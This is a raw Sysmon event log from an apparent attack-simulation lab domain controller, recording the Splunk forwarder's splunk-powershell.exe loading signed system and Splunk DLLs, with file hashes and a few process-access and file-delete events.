734700x800000000000000098346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.760{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 10341000x800000000000000098345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.760{326FD73D-C079-6294-2C0B-000000005502}9642708C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.760{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000098343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.760{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 23542300x800000000000000098342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.697{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E91FDA6814C499E75A5094CE6480AA7F,SHA256=4D0FBB8844A04D927E9A0594C7B3B76CB78FEA70D3E6DF3FC84ADF208F79DB13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000098341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000098340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000098339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000098338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000098337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000098336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.557{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:02:49.541{326FD73D-C079-6294-2C0B-000000005502}964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 